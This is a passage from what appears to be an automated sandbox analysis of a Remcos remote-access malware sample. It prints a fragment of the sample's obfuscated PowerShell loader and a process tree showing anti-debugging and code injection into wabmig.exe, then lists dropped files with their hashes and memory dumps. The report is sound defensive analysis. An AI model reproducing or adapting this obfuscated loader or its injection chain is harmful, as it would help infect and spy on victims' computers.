soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2584
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2112
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2768

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      2629e35680aa33f66231c447fcdfb956

      SHA1

      66bf2663992b42f976dd81b303f86e2f2e861700

      SHA256

      09cf72cc7bd1f7dec7f1bf6201a421fd1c88b2a01fd68c1e970580e6207d8965

      SHA512

      5a73eafa12e7be4356be896b9afb602ee2c1d359d70047d5e39e69e997e89eee0c0b5092703bb7ba5d272e19593b642bb1a964525bc75c41641f95346a54b1a7

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      fbc10c384b33f066e4062bede2cdbe99

      SHA1

      975bcde178dc1d35c5a531a60679a06b988ba511

      SHA256

      88debac1187aa733b61a7bb77aec5b882f639cccb2c8e09e4d64b30b81b118d4

      SHA512

      b7f2c4720a7ac56aa81a8592bdacb21d7aa7c4b3323cbd56bdac42fc48d3a504a3d9eaf245551252b8a1841c873f615e76c539197e47a9c0b4c572d7b1945fa8

    • C:\Users\Admin\AppData\Local\Temp\Cab9B29.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar16FB.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Microchip1.Ana

      Filesize

      470KB

      MD5

      dc8b20ecb669b12cb2d377e69425b1ae

      SHA1

      7f95a7e40871adbc900378d69125f01672b99484

      SHA256

      efb89bbdef46898ebbb533b069a851427aef1b99983e3156e9b88e4a846828b3

      SHA512

      b9706209f6b21907e9bbc784638877f612674926b12cb2a73bdc0ad50ae93a2dc4e358c5bf524729732afd9798d13aebdcdaa5e424d785819c4cbff9b3ada141

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATUT4I9LLC7R4B4PPJB.temp

      Filesize

      7KB

      MD5

      c174779a3cd0e99af4ac09a8f0c348ca

      SHA1

      fe356a28744cc305fa8c3e64289da4ea55f0c1e5

      SHA256

      ccad0a305e0d4e1994ee2b198bdc0ae6d32e7dd1469c57e359b768b75cdf7275

      SHA512

      912738b6f6652dea0fd1f1d163e8b92fffd84a48eac790b4e7353f3edf220f0a145b74acdb61f55c418c76e6198e4b950fb5c84d36114d9ad0cf3b3e8b2de496

    • memory/2236-24-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-21-0x000000001B5B0000-0x000000001B892000-memory.dmp

      Filesize

      2.9MB

    • memory/2236-28-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-29-0x000007FEF570E000-0x000007FEF570F000-memory.dmp

      Filesize

      4KB

    • memory/2236-30-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-25-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-23-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-20-0x000007FEF570E000-0x000007FEF570F000-memory.dmp

      Filesize

      4KB

    • memory/2236-62-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2236-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2236-26-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

      Filesize

      9.6MB

    • memory/2584-35-0x00000000065D0000-0x00000000093DB000-memory.dmp

      Filesize

      46.0MB

    • memory/2768-60-0x0000000000420000-0x0000000001482000-memory.dmp

      Filesize

      16.4MB

    • memory/2768-36-0x0000000001490000-0x000000000429B000-memory.dmp

      Filesize

      46.0MB

    • memory/2768-61-0x0000000001490000-0x000000000429B000-memory.dmp

      Filesize

      46.0MB